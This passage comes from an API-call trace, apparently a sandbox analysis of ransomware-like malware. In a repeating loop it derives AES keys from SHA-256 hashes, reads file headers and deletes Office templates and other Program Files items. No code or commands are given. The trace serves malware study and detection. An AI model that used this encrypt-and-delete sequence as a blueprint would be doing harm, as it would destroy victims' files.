Files\\Microsoft Office\\Templates\\1033\\FiveRules.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\fiverules.potx")) returned 1 [0181.927] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0181.927] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0181.927] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0181.927] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0181.927] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10b563f [0181.927] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0183.656] CryptDestroyHash (hHash=0x284d568) returned 1 [0183.656] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0183.656] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0183.658] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\IntroducingPowerPoint2010.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\introducingpowerpoint2010.potx")) returned 1 [0183.666] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0183.666] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0183.666] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.667] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0183.667] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf6a1 [0183.667] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0183.701] CryptDestroyHash (hHash=0x284d668) returned 1 [0183.701] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0183.701] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0183.702] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\LoanAmortization.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\loanamortization.xltx")) returned 1 [0183.704] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0183.705] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0183.705] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.705] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0183.705] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xab82 [0183.705] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0183.726] CryptDestroyHash (hHash=0x284d568) returned 1 [0183.726] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0183.726] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0183.727] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Office Word 2003 Look.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\office word 2003 look.dotx")) returned 1 [0183.729] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0183.730] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0183.731] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0183.731] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0183.731] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0183.732] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0183.732] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.732] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0183.732] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x75b3 [0183.732] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0183.740] CryptDestroyHash (hHash=0x284d668) returned 1 [0183.740] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0183.740] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0183.742] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\PersonalMonthlyBudget.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\personalmonthlybudget.xltx")) returned 1 [0183.752] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0183.753] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0183.753] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.753] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0183.753] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e590 [0183.753] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0183.773] CryptDestroyHash (hHash=0x284d568) returned 1 [0183.773] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0183.773] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0183.774] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Pitchbook.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\pitchbook.potx")) returned 1 [0183.777] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0183.777] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0183.777] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.777] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0183.777] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9fd6a [0183.777] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0183.822] CryptDestroyHash (hHash=0x284d668) returned 1 [0183.822] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0183.822] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0183.824] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ProjectStatusReport.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\projectstatusreport.potx")) returned 1 [0183.830] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0183.831] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0183.831] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.831] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0183.831] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17697 [0183.831] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0183.840] CryptDestroyHash (hHash=0x284d568) returned 1 [0183.840] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0183.840] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0183.842] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\QuizShow.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\quizshow.potx")) returned 1 [0183.844] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0183.845] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0183.845] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.845] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0183.845] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa8ed [0183.845] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0183.861] CryptDestroyHash (hHash=0x284d668) returned 1 [0183.862] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0183.862] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0183.863] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\SalesReport.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\salesreport.xltx")) returned 1 [0183.865] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0183.866] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0183.866] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.866] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0183.866] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x44ff [0183.866] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0183.875] CryptDestroyHash (hHash=0x284d568) returned 1 [0183.875] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0183.875] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0183.877] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\TimeCard.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\timecard.xltx")) returned 1 [0183.879] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0183.880] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0183.880] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.880] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0183.880] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12f35d [0183.880] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0183.981] CryptDestroyHash (hHash=0x284d668) returned 1 [0183.981] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0183.981] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0183.985] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Training.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\training.potx")) returned 1 [0183.987] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0183.988] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0183.988] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.988] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0183.988] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x40d6e8 [0183.988] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0184.542] CryptDestroyHash (hHash=0x284d568) returned 1 [0184.542] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0184.542] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0184.544] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanPhotoAlbum.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanphotoalbum.potx")) returned 1 [0184.549] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0184.549] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0184.549] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.549] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0184.549] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2df34 [0184.549] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0184.622] CryptDestroyHash (hHash=0x284d668) returned 1 [0184.622] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0184.622] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0184.623] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\WidescreenPresentation.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\widescreenpresentation.potx")) returned 1 [0184.626] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0184.627] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0184.627] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.627] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0184.627] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0184.627] ReadFile (in: hFile=0x4c8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0184.628] CryptDestroyHash (hHash=0x284d568) returned 1 [0184.628] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0184.628] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0184.630] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\_help.txt")) returned 1 [0184.631] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.631] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0184.632] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0184.632] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.632] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0184.632] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0184.632] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x0, lpOverlapped=0x0) returned 1 [0184.632] CloseHandle (hObject=0x4ac) returned 1 [0184.633] CloseHandle (hObject=0x4c8) returned 1 [0184.633] CryptDestroyHash (hHash=0x284d668) returned 1 [0184.633] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0184.633] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0184.634] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\Maple.gif" (normalized: "c:\\program files\\microsoft office\\templates\\presentation designs\\maple.gif")) returned 1 [0184.636] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.676] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.677] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.677] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.677] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.678] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.679] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.679] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.679] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0184.680] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0184.680] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.680] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0184.680] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1afd7 [0184.680] ReadFile (in: hFile=0x584, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0184.713] CryptDestroyHash (hHash=0x284d668) returned 1 [0184.713] CryptDestroyKey (hKey=0x284d628) returned 1 [0184.713] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0184.729] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\synchronizationeula.rtf")) returned 1 [0184.732] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.741] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.742] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.742] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.743] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.743] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.750] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.751] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.751] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.752] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.752] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.752] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.752] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.752] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.752] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.756] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.757] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.757] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0184.758] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0184.758] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.758] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0184.758] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1bd4 [0184.758] ReadFile (in: hFile=0x588, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0184.765] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0184.765] CryptDestroyKey (hKey=0x284d628) returned 1 [0184.765] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0184.777] DeleteFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml")) returned 1 [0184.779] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0184.779] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0184.779] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.779] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0184.779] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa12 [0184.779] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0184.787] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0184.787] CryptDestroyKey (hKey=0x284d668) returned 1 [0184.787] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0184.800] DeleteFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml")) returned 1 [0184.803] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.804] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.809] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0184.810] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0184.810] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.810] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0184.810] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5ec3 [0184.810] ReadFile (in: hFile=0x4ac, lpBuffer=0x32697b4, 